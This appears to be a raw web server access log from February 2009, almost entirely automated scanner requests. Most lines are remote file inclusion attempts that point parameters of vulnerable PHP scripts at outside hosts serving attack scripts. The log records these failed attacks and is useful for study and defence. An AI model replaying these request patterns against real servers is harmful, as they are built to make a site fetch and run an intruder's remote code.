91.121.24.179 - - [05/Feb/2009:03:17:39 -0600] "GET /logs/access_log.1215907200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:17:49 -0600] "GET /logs/access_log.1215907200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:18:34 -0600] "GET /logs/access_log.1213747200/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:18:35 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:18:35 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:18:42 -0600] "GET /logs/access_log.1213401600/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:03:20:01 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:03:20:01 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:03:20:43 -0600] "GET /pafiledb/includes/pafiledb_constants.php?module_root_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:03:20:49 -0600] "GET /logs/pafiledb/includes/pafiledb_constants.php?module_root_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
89.108.82.20 - - [05/Feb/2009:03:21:02 -0600] "GET /logs/access_log.1219017600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:03:21:03 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:03:21:03 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
61.63.18.78 - - [05/Feb/2009:03:21:43 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:03:21:43 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:03:21:44 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
67.225.245.33 - - [05/Feb/2009:03:21:50 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:03:21:50 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:03:21:52 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
89.108.82.20 - - [05/Feb/2009:03:22:42 -0600] "GET /logs/access_log.1215907200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
84.21.71.133 - - [05/Feb/2009:03:23:12 -0600] "GET /logs/access_log.1216080000//common.inc.php?CFG[libdir]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:03:23:15 -0600] "GET /logs//common.inc.php?CFG[libdir]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:03:23:15 -0600] "GET //common.inc.php?CFG[libdir]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:23:21 -0600] "GET /logs/access_log.1211241600/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:23:21 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:23:22 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:24:06 -0600] "GET /logs/access_log.1210550400/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:03:24:56 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:24:57 -0600] "GET /logs/access_log.1210636800/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
80.25.82.126 - - [05/Feb/2009:03:26:43 -0600] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 345 "-""libwww-perl/5.76"
80.25.82.126 - - [05/Feb/2009:03:26:44 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 318 "-""libwww-perl/5.76"
80.25.82.126 - - [05/Feb/2009:03:26:44 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 323 "-""libwww-perl/5.76"
67.225.245.33 - - [05/Feb/2009:03:28:55 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
80.25.82.126 - - [05/Feb/2009:03:29:19 -0600] "GET /logs/access_log.1219017600//admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 345 "-""libwww-perl/5.76"
67.76.163.60 - - [05/Feb/2009:03:29:23 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:29:23 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:29:29 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:29:55 -0600] "GET /logs/access_log.1219968000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:29:57 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:29:58 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:30:04 -0600] "GET /logs/access_log.1219795200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
89.108.82.20 - - [05/Feb/2009:03:30:15 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
12.53.219.68 - - [05/Feb/2009:03:31:09 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jiaoshi.com.cn/status/AhoK/running/osid6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
12.53.219.68 - - [05/Feb/2009:03:31:09 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jiaoshi.com.cn/status/AhoK/running/osid6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
12.53.219.68 - - [05/Feb/2009:03:31:09 -0600] "GET /logs/access_log.1218153600%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jiaoshi.com.cn/status/AhoK/running/osid6.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
222.236.47.182 - - [05/Feb/2009:03:32:07 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://clear.fileave.com/header.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
64.18.194.51 - - [05/Feb/2009:03:32:20 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:03:32:21 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:33:14 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:33:15 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:33:15 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.108.82.20 - - [05/Feb/2009:03:33:34 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:03:33:34 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
24.187.213.30 - - [05/Feb/2009:03:33:51 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
24.187.213.30 - - [05/Feb/2009:03:33:51 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
24.187.213.30 - - [05/Feb/2009:03:33:51 -0600] "GET /logs/access_log.1225929600//s_loadenv.inc.php?DOCUMENT_ROOT=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
24.187.213.30 - - [05/Feb/2009:03:33:55 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.108.82.20 - - [05/Feb/2009:03:33:59 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:03:34:00 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:03:34:00 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
88.191.95.106 - - [05/Feb/2009:03:34:32 -0600] "GET /logs/access_log.1219536000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
91.121.24.179 - - [05/Feb/2009:03:34:36 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:03:34:37 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:03:34:37 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
88.191.95.106 - - [05/Feb/2009:03:35:23 -0600] "GET /logs/access_log.1216944000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
84.21.71.133 - - [05/Feb/2009:03:35:46 -0600] "GET /logs/access_log.1216944000//common.inc.php?CFG[libdir]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
12.53.219.68 - - [05/Feb/2009:03:37:09 -0600] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jiaoshi.com.cn/status/AhoK/running/osid6.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
12.53.219.68 - - [05/Feb/2009:03:37:16 -0600] "GET /logs/access_log.1218153600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jiaoshi.com.cn/status/AhoK/running/osid6.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:37:35 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
222.236.47.182 - - [05/Feb/2009:03:37:48 -0600] "GET /logs//RGboard/include/footer.php?_path[counter]=http://orls-hi.org//_private/test.txt?? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
222.236.47.182 - - [05/Feb/2009:03:37:50 -0600] "GET //RGboard/include/footer.php?_path[counter]=http://orls-hi.org//_private/test.txt?? HTTP/1.1" 404 311 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
64.18.194.51 - - [05/Feb/2009:03:39:36 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:03:39:36 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.101.4.49 - - [05/Feb/2009:03:39:54 -0600] "GET /logs/access_log.1211673600//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.101.4.49 - - [05/Feb/2009:03:39:54 -0600] "GET //ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.101.4.49 - - [05/Feb/2009:03:40:14 -0600] "GET /logs/access_log.1212019200//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.101.4.49 - - [05/Feb/2009:03:40:24 -0600] "GET /logs/access_log.1209686400//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:03:40:24 -0600] "GET //ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:03:40:25 -0600] "GET /logs//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:03:42:50 -0600] "GET //ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:03:43:14 -0600] "GET /logs/access_log.1211328000//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
202.44.52.78 - - [05/Feb/2009:03:44:13 -0600] "GET /logs///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:03:44:13 -0600] "GET ///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:03:44:13 -0600] "GET /logs/access_log.1218758400///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:03:44:37 -0600] "GET /logs/access_log.1213660800///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
217.75.209.39 - - [05/Feb/2009:03:44:54 -0600] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.75.209.39 - - [05/Feb/2009:03:44:54 -0600] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.75.209.39 - - [05/Feb/2009:03:44:54 -0600] "GET /logs/access_log.1218758400/accounts/inc/include.php?language=0&lang_settings[0][1]=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
132.248.117.152 - - [05/Feb/2009:03:45:14 -0600] "GET /logs/access_log.1216080000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:45:14 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:45:14 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:45:57 -0600] "GET /logs/access_log.1215216000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:45:58 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:45:58 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:46:48 -0600] "GET /logs/access_log.1212278400/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
125.28.144.122 - - [05/Feb/2009:03:46:55 -0600] "GET /logs/access_log.1210982400 HTTP/1.1" 200 196608 "http://www.google.co.jp/search?hl=ja&rlz=1B3GGGL_jaJP303JP303&q=warriors-mozilla+firefox&btnG=%E6%A4%9C%E7%B4%A2&lr=""Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
125.28.144.122 - - [05/Feb/2009:03:46:55 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
125.28.144.122 - - [05/Feb/2009:03:46:58 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
82.194.72.142 - - [05/Feb/2009:03:47:46 -0600] "GET /logs/access_log.1217203200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:47:47 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:47:47 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
217.75.209.39 - - [05/Feb/2009:03:49:00 -0600] "GET /logs/access_log.1218758400%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
74.53.121.130 - - [05/Feb/2009:03:49:13 -0600] "GET /errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.53.121.130 - - [05/Feb/2009:03:49:13 -0600] "GET /logs/access_log.1212278400/errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.53.121.130 - - [05/Feb/2009:03:49:13 -0600] "GET /logs/errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.53.121.130 - - [05/Feb/2009:03:49:13 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
87.101.4.49 - - [05/Feb/2009:03:49:55 -0600] "GET /logs//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:03:49:55 -0600] "GET //ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
216.22.26.95 - - [05/Feb/2009:03:50:03 -0600] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:03 -0600] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:03 -0600] "GET /logs/access_log.1216944000%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:04 -0600] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:04 -0600] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:04 -0600] "GET /logs/access_log.1216944000%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:08 -0600] "GET /logs/access_log.1211328000%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:03:50:09 -0600] "GET /logs/access_log.1211328000%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
65.55.208.136 - - [05/Feb/2009:03:50:25 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [05/Feb/2009:03:50:25 -0600] "GET /logs/access_log.1159574400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [05/Feb/2009:03:50:26 -0600] "GET /logs/access_log.1173484800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.101.4.49 - - [05/Feb/2009:03:50:27 -0600] "GET /logs//ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:03:50:27 -0600] "GET //ask_password.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
74.53.121.130 - - [05/Feb/2009:03:50:51 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.121.130 - - [05/Feb/2009:03:50:51 -0600] "GET /errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.121.130 - - [05/Feb/2009:03:50:51 -0600] "GET /logs/errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
